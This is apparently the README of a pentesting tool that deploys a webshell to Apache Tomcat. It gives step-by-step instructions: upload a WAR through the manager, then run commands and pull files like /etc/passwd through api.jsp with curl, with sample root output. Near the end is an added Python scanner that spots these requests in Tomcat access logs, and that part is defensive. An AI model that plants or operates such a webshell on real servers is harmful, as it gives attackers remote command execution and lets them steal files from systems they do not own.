p0dalirius/Tomcat-webshell-application


A webshell application and interactive shell for pentesting Apache Tomcat servers.

Features

  • Webshell plugin for Apache Tomcat.
  • Execute system commands via an API with ?action=exec.
  • Download files from the remote system to your attacking machine with ?action=download.

Usage

Requirements: You need the credentials of a high-privilege account on the Apache Tomcat server.

Step 1: Access the Tomcat manager and upload the webshell plugin

First of all, you will need to access the Apache Tomcat /manager page at http://127.0.0.1:10080/manager/html, and connect to it with a high-privilege account of the Apache Tomcat server.

Then choose the WAR file of the webshell plugin and click on "Deploy".

The application is then deployed.

Step 2.1: Executing commands

You can now execute commands by sending a GET or POST request to http://127.0.0.1:10080/webshell/api.jsp with action=exec&cmd=id:

$ curl -X POST 'http://127.0.0.1:10080/webshell/api.jsp' --data "action=exec&cmd=id"
{"stdout":"uid=0(root) gid=0(root) groups=0(root)\n","stderr":"","exec":["/bin/bash","-c","id"]}

You can also access it by a GET request from a browser.

Step 2.2: Downloading files

You can also download remote files by sending a GET or POST request to http://127.0.0.1:10080/webshell/api.jsp with action=download&cmd=/etc/passwd:

$ curl -X POST 'http://127.0.0.1:10080/webshell/api.jsp' --data "action=download&path=/etc/passwd" -o-
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin

Step 3: The interactive console

When your webshell is active, you can now use the interactive console.py to execute commands and download remote files.
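On the defending side, the requests in the steps above leave a recognizable trail in the Tomcat access log. The following is an added example, not part of this project: it scans constructed log lines in Tomcat's common access-log format for the manager WAR upload and for the api.jsp calls shown above. The /manager/html/upload path, the rule names and the sample lines are assumptions made for the example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample in Tomcat's "common" access-log pattern (%h %l %u %t "%r" %s %b).
SAMPLE_LOG = """\
10.0.0.5 - admin [12/Mar/2024:10:01:02 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19876
10.0.0.5 - - [12/Mar/2024:10:01:30 +0000] "GET /webshell/api.jsp?action=exec&cmd=id HTTP/1.1" 200 97
10.0.0.5 - - [12/Mar/2024:10:01:41 +0000] "POST /webshell/api.jsp HTTP/1.1" 200 97
10.0.0.5 - - [12/Mar/2024:10:02:05 +0000] "GET /webshell/api.jsp?action=download&path=%2Fetc%2Fpasswd HTTP/1.1" 200 1024
10.0.0.9 - - [12/Mar/2024:10:03:00 +0000] "GET /shop/cart.jsp?action=view HTTP/1.1" 200 5120
"""

# Assumption: the HTML manager's "Deploy" form posts the WAR file to this path.
MANAGER_UPLOAD = "/manager/html/upload"
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" \d{3} \S+$')


def scan(log_text):
    """Return (client_ip, rule, request_target) for each suspicious log line."""
    findings, flagged_paths = [], set()
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a common-format access-log line
        ip, method, target = m.groups()
        url = urlsplit(target)
        action = parse_qs(url.query).get("action", [""])[0]
        if method == "POST" and url.path == MANAGER_UPLOAD:
            # A WAR deployment through the manager: verify it was a planned change.
            findings.append((ip, "manager-war-upload", target))
        elif url.path.endswith(".jsp") and action in ("exec", "download"):
            # The GET form of the API puts action=exec / action=download in the URL.
            flagged_paths.add(url.path)
            findings.append((ip, "webshell-" + action, target))
        elif method == "POST" and url.path in flagged_paths:
            # POST bodies are not written to the access log, so correlate on a
            # JSP path that already matched the query-string rule.
            findings.append((ip, "webshell-post", target))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(*finding, sep="\t")
```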


Development

If you need to compile this plugin, you can use the docker image provided: simply type make to build the plugin present in the webshell folder. Output WAR files will be put in the ./webshell/dist/ folder.

Then if you need to test the plugin locally, you can start an Apache Tomcat instance with the test environment in ./test_env/.
